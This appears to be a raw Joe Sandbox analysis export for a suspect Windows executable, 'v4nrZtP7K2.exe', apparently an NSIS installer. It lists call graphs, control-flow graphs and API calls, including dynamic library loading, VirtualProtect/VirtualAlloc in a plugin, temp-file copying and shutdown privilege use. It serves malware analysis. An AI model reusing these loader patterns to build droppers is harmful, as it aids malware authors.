4729 403d48 DialogBoxParamW 4725->4729 4726->4701 4727->4725 4728->4729 4731 40140b 2 API calls 4729->4731 4730->4701 4731->4701 4732->4576 4733->4609 4734->4616 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4585 4743->4586 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4674 4761->4666 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4685 4771->4691 4773 4043ab SendMessageW 4772->4773 4777 405546 4773->4777 4774 40556d 4775 4043ab SendMessageW 4774->4775 4776 40557f OleUninitialize 4775->4776 4776->4722 4777->4774 4778 401389 2 API calls 4777->4778 4778->4777 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5904 404ba6 5905 404bd2 5904->5905 5906 404bb6 5904->5906 5908 404c05 5905->5908 5909 404bd8 SHGetPathFromIDListW 5905->5909 5915 405a32 GetDlgItemTextW 5906->5915 5911 404bef SendMessageW 5909->5911 5912 404be8 5909->5912 5910 404bc3 SendMessageW 5910->5905 5911->5908 5914 40140b 2 API calls 5912->5914 5914->5911 5915->5910 4882 6ffb2993 4883 6ffb29e3 4882->4883 4884 6ffb29a3 VirtualProtect 4882->4884 4884->4883 5930 4029a8 5931 402c1f 17 API calls 5930->5931 5932 4029ae 5931->5932 5933 4029d5 5932->5933 5934 4029ee 5932->5934 5940 40288b 5932->5940 5935 4029da 5933->5935 5936 4029eb 5933->5936 5937 402a08 5934->5937 5938 4029f8 5934->5938 5944 4063e8 lstrcpynW 5935->5944 5936->5940 5945 40632f wsprintfW 5936->5945 5939 40640a 17 API calls 5937->5939 5941 402c1f 17 API calls 5938->5941 5939->5936 5941->5936 5944->5940 5945->5940 5946 4028ad 5947 402c41 17 API calls 5946->5947 5948 4028bb 5947->5948 5949 4028d1 5948->5949 5950 402c41 17 API calls 5948->5950 5951 405eb9 2 API calls 5949->5951 5950->5949 5952 4028d7 5951->5952 5974 405ede GetFileAttributesW CreateFileW 5952->5974 5954 4028e4 5955 4028f0 GlobalAlloc 5954->5955 5956 402987 5954->5956 5959 402909 5955->5959 5960 40297e CloseHandle 5955->5960 5957 4029a2 5956->5957 5958 40298f DeleteFileW 5956->5958 5958->5957 5975 40345d SetFilePointer 5959->5975 5960->5956 5962 40290f 5963 403447 ReadFile 5962->5963 5964 402918 GlobalAlloc 5963->5964 5965 402928 5964->5965 5966 40295c 5964->5966 5967 4031d6 44 API calls 5965->5967 5968 405f90 WriteFile 5966->5968 5973 402935 5967->5973 5969 402968 GlobalFree 5968->5969 5970 4031d6 44 API calls 5969->5970 5972 40297b 5970->5972 5971 402953 GlobalFree 5971->5966 5972->5960 5973->5971 5974->5954 5975->5962 5983 401a30 5984 402c41 17 API calls 5983->5984 5985 401a39 ExpandEnvironmentStringsW 5984->5985 5986 401a4d 5985->5986 5988 401a60 5985->5988 5987 401a52 lstrcmpW 5986->5987 5986->5988 5987->5988 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5077 402250 5070->5077 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5084 405450 24 API calls 5080->5084 5081 40208c 5082 402094 5081->5082 5083 4020ab 5081->5083 5085 401423 24 API calls 5082->5085 5092 6ffb1777 5083->5092 5086 40209c 5084->5086 5085->5086 5086->5077 5087 4020e8 FreeLibrary 5086->5087 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 6ffb17aa 5092->5093 5134 6ffb1b5f 5093->5134 5095 6ffb17b1 5096 6ffb18d6 5095->5096 5097 6ffb17c9 5095->5097 5098 6ffb17c2 5095->5098 5096->5086 5168 6ffb2394 5097->5168 5184 6ffb2352 5098->5184 5103 6ffb180f 5197 6ffb2569 5103->5197 5104 6ffb182d 5107 6ffb187e 5104->5107 5108 6ffb1833 5104->5108 5105 6ffb17f8 5120 6ffb17ee 5105->5120 5194 6ffb2d37 5105->5194 5106 6ffb17df 5110 6ffb17e5 5106->5110 5111 6ffb17f0 5106->5111 5115 6ffb2569 10 API calls 5107->5115 5216 6ffb15c6 5108->5216 5110->5120 5178 6ffb2aac 5110->5178 5188 6ffb2724 5111->5188 5121 6ffb186f 5115->5121 5116 6ffb1815 5208 6ffb15b4 5116->5208 5120->5103 5120->5104 5126 6ffb18c5 5121->5126 5222 6ffb252c 5121->5222 5123 6ffb17f6 5123->5120 5124 6ffb2569 10 API calls 5124->5121 5126->5096 5128 6ffb18cf GlobalFree 5126->5128 5128->5096 5131 6ffb18b1 5131->5126 5226 6ffb153d wsprintfW 5131->5226 5132 6ffb18aa FreeLibrary 5132->5131 5229 6ffb121b GlobalAlloc 5134->5229 5136 6ffb1b83 5230 6ffb121b GlobalAlloc 5136->5230 5138 6ffb1da9 GlobalFree GlobalFree GlobalFree 5139 6ffb1dc6 5138->5139 5154 6ffb1e10 5138->5154 5140 6ffb2192 5139->5140 5148 6ffb1ddb 5139->5148 5139->5154 5142 6ffb21b4 GetModuleHandleW 5140->5142 5140->5154 5141 6ffb1c64 GlobalAlloc 5160 6ffb1b8e 5141->5160 5145 6ffb21da 5142->5145 5146 6ffb21c5 LoadLibraryW 5142->5146 5143 6ffb1caf lstrcpyW 5147 6ffb1cb9 lstrcpyW 5143->5147 5144 6ffb1ccd GlobalFree 5144->5160 5237 6ffb161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5145->5237 5146->5145 5146->5154 5147->5160 5148->5154 5233 6ffb122c 5148->5233 5150 6ffb222c 5153 6ffb2239 lstrlenW 5150->5153 5150->5154 5152 6ffb2064 5236 6ffb121b GlobalAlloc 5152->5236 5238 6ffb161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5238 5154->5095 5155 6ffb21ec 5155->5150 5166 6ffb2216 GetProcAddress 5155->5166 5156 6ffb20ec 5156->5154 5163 6ffb2134 lstrcpyW 5156->5163 5159 6ffb2253 5159->5154 5160->5138 5160->5141 5160->5143 5160->5144 5160->5147 5160->5152 5160->5154 5160->5156 5161 6ffb1d0b 5160->5161 5162 6ffb1fa5 GlobalFree 5160->5162 5164 6ffb122c 2 API calls 5160->5164 5161->5160 5231 6ffb158f GlobalSize GlobalAlloc 5161->5231 5162->5160 5163->5154 5164->5160 5166->5150 5167 6ffb206d 5167->5095 5170 6ffb23ac 5168->5170 5169 6ffb122c GlobalAlloc lstrcpynW 5169->5170 5170->5169 5172 6ffb24d5 GlobalFree 5170->5172 5173 6ffb247f GlobalAlloc CLSIDFromString 5170->5173 5174 6ffb2454 GlobalAlloc WideCharToMultiByte 5170->5174 5177 6ffb249e 5170->5177 5240 6ffb12ba 5170->5240 5172->5170 5175 6ffb17cf 5172->5175 5173->5172 5174->5172 5175->5105 5175->5106 5175->5120 5177->5172 5244 6ffb26b8 5177->5244 5180 6ffb2abe 5178->5180 5179 6ffb2b63 EnumWindows 5183 6ffb2b81 5179->5183 5180->5179 5182 6ffb2c4d 5182->5120 5247 6ffb2a56 5183->5247 5185 6ffb2367 5184->5185 5186 6ffb17c8 5185->5186 5187 6ffb2372 GlobalAlloc 5185->5187 5186->5097 5187->5185 5192 6ffb2754 5188->5192 5189 6ffb27ef GlobalAlloc 5193 6ffb2812 5189->5193 5190 6ffb2802 5191 6ffb2808 GlobalSize 5190->5191 5190->5193 5191->5193 5192->5189 5192->5190 5193->5123 5195 6ffb2d42 5194->5195 5196 6ffb2d82 GlobalFree 5195->5196 5251 6ffb121b GlobalAlloc 5197->5251 5199 6ffb261f lstrcpynW 5205 6ffb2573 5199->5205 5200 6ffb260e StringFromGUID2 5200->5205 5201 6ffb25ec MultiByteToWideChar 5201->5205 5202 6ffb2632 wsprintfW 5202->5205 5203 6ffb2656 GlobalFree 5203->5205 5204 6ffb268b GlobalFree 5204->5116 5205->5199 5205->5200 5205->5201 5205->5202 5205->5203 5205->5204 5206 6ffb1272 2 API calls 5205->5206 5252 6ffb12e1 5205->5252 5206->5205 5256 6ffb121b GlobalAlloc 5208->5256 5210 6ffb15b9 5211 6ffb15c6 2 API calls 5210->5211 5212 6ffb15c3 5211->5212 5213 6ffb1272 5212->5213 5214 6ffb127b GlobalAlloc lstrcpynW 5213->5214 5215 6ffb12b5 GlobalFree 5213->5215 5214->5215 5215->5121 5217 6ffb15ff lstrcpyW 5216->5217 5218 6ffb15d2 wsprintfW 5216->5218 5221 6ffb1618 5217->5221 5218->5221 5221->5124 5223 6ffb253a 5222->5223 5224 6ffb1891 5222->5224 5223->5224 5225 6ffb2556 GlobalFree 5223->5225 5224->5131 5224->5132 5225->5223 5227 6ffb1272 2 API calls 5226->5227 5228 6ffb155e 5227->5228 5228->5126 5229->5136 5230->5160 5232 6ffb15ad 5231->5232 5232->5161 5239 6ffb121b GlobalAlloc 5233->5239 5235 6ffb123b lstrcpynW 5235->5154 5236->5167 5237->5155 5238->5159 5239->5235 5241 6ffb12c1 5240->5241 5242 6ffb122c 2 API calls 5241->5242 5243 6ffb12df 5242->5243 5243->5170 5245 6ffb271c 5244->5245 5246 6ffb26c6 VirtualAlloc 5244->5246 5245->5177 5246->5245 5248 6ffb2a61 5247->5248 5249 6ffb2a71 5248->5249 5250 6ffb2a66 GetLastError 5248->5250 5249->5182 5250->5249 5251->5205 5253 6ffb12ea 5252->5253 5254 6ffb130c 5252->5254 5253->5254 5255 6ffb12f0 lstrcpyW 5253->5255 5254->5205 5255->5254 5256->5210 5994 402a35 5995 402c1f 17 API calls 5994->5995 5996 402a3b 5995->5996 5997 402a72 5996->5997 5998 40288b 5996->5998 6000 402a4d 5996->6000 5997->5998 5999 40640a 17 API calls 5997->5999 5999->5998 6000->5998 6002 40632f wsprintfW 6000->6002 6002->5998 6003 401735 6004 402c41 17 API calls 6003->6004 6005 40173c SearchPathW 6004->6005 6006 4029e6 6005->6006 6007 401757 6005->6007 6007->6006 6009 4063e8 lstrcpynW 6007->6009 6009->6006 6010 4014b8 6011 4014be 6010->6011 6012 401389 2 API calls 6011->6012 6013 4014c6 6012->6013 6014 401db9 GetDC 6015 402c1f 17 API calls 6014->6015 6016 401dcb GetDeviceCaps MulDiv ReleaseDC 6015->6016 6017 402c1f 17 API calls 6016->6017 6018 401dfc 6017->6018 6019 40640a 17 API calls 6018->6019 6020 401e39 CreateFontIndirectW 6019->6020 6021 402592 6020->6021 6022 40283b 6023 402843 6022->6023 6024 402847 FindNextFileW 6023->6024 6025 402859 6023->6025 6024->6025 6027 4029e6 6025->6027 6028 4063e8 lstrcpynW 6025->6028 6028->6027 6029 6ffb1000 6030 6ffb101b 5 API calls 6029->6030 6031 6ffb1019 6030->6031

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 31->33 34 4035db-4035df 31->34 32->31 32->32 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 41 4035f2-4035fa 37->41 42 40360b-403644 37->42 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 46 403601 41->46 47 4035fc-4035ff 41->47 48 403661-40369b 42->48 49 403646-40364b 42->49 46->42 47->42 47->46 48->36 57 40369d-4036a1 48->57 49->48 56 40364d-403655 49->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 67 4036d5 59->67 74 403810 60->74 77 403782-4037b7 61->77 78 4037ce-4037d8 61->78 63->48 63->64 64->48 65->67 67->29 74->54 80 403952-403968 GetCurrentProcess OpenProcessToken 75->80 81 4039ce-4039d6 75->81 84 4037b9-4037bd 77->84 87 403840-403854 call 4059b9 lstrcatW 78->87 88 4037da-4037e8 call 405dc5 78->88 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 80->82 83 40399e-4039ac call 4067c2 80->83 85 4039d8 81->85 86 4039dc-4039e0 ExitProcess 81->86 82->83 101 4039ba-4039c5 ExitWindowsEx 83->101 102 4039ae-4039b8 83->102 91 4037c6-4037ca 84->91 92 4037bf-4037c4 84->92 85->86 99 403861-40387b lstrcatW lstrcmpiW 87->99 100 403856-40385c lstrcatW 87->100 88->54 103 4037ea-403800 call 4063e8 * 2 88->103 91->84 96 4037cc 91->96 92->91 92->96 96->78 99->54 105 40387d-403880 99->105 100->99 101->81 106 4039c7-4039c9 call 40140b 101->106 102->101 102->106 103->60 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->81 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                      • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\v4nrZtP7K2.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\v4nrZtP7K2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 3441113951-2490128399
                                                                                      • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                      • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 159 4051c7-4051cf 152->159 160 405158-40515e 152->160 153->154 154->151 162 405089-40508c 155->162 163 4050fc-4050ff 155->163 156->152 156->155 195 404f33-404f39 157->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 157->196 168 4051d1-4051d7 SendMessageW 159->168 169 4051d9-4051e0 159->169 165 405164-40516e 160->165 166 4053af-4053c1 call 4043c6 160->166 171 405097-4050ac call 404d1a 162->171 172 40508e-405095 162->172 163->152 167 405101-40510b 163->167 165->166 175 405174-405183 SendMessageW 165->175 177 40511b-405125 167->177 178 40510d-405119 SendMessageW 167->178 168->169 179 4051e2-4051e9 169->179 180 405214-40521b 169->180 171->163 194 4050ae-4050bf 171->194 172->163 172->171 175->166 187 405189-40519a SendMessageW 175->187 177->152 189 405127-405131 177->189 178->177 181 4051f2-4051f9 179->181 182 4051eb-4051ec ImageList_Destroy 179->182 185 405371-405378 180->185 186 405221-40522d call 4011ef 180->186 192 405202-40520e 181->192 193 4051fb-4051fc GlobalFree 181->193 182->181 185->166 200 40537a-405381 185->200 211 40523d-405240 186->211 212 40522f-405232 186->212 198 4051a4-4051a6 187->198 199 40519c-4051a2 187->199 190 405142-40514c 189->190 191 405133-405140 189->191 190->152 191->152 192->180 193->192 194->163 201 4050c1-4050c3 194->201 202 404f3c-404f43 195->202 206 405011-405015 196->206 204 4051a7-4051c0 call 401299 SendMessageW 198->204 199->198 199->204 200->166 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->205 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->159 205->166 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 218 4050d2-4050d4 207->218 219 4050ce-4050d0 207->219 222 4050d9-4050f5 call 40117d 208->222 209->202 226 404ff2-404ff6 209->226 220 404f73-404fa9 SendMessageW 210->220 221 404fab-404fad 210->221 227 405281-4052a5 call 4011ef 211->227 228 405242-40525b call 4012e2 call 401299 211->228 223 405234 212->223 224 405235-405238 call 404d9a 212->224 214->166 215->140 218->222 219->222 220->209 232 404fc0-404fd6 SendMessageW 221->232 233 404faf-404fbe SendMessageW 221->233 222->163 223->224 224->211 226->196 226->206 241 405347-40535b InvalidateRect 227->241 242 4052ab 227->242 246 40526b-40527a SendMessageW 228->246 247 40525d-405263 228->247 232->209 233->209 241->185 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->185 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->227 251 405265 247->251 252 405266-405269 247->252 254 4052cc-4052d9 248->254 255 4052dd-4052e0 248->255 249->241 249->245 251->252 252->246 252->247 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 260 4052f5-40532d SendMessageW * 2 256->260 259 4052f2 257->259 257->260 259->260 260->249
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                      • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                      • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                      • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                      • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
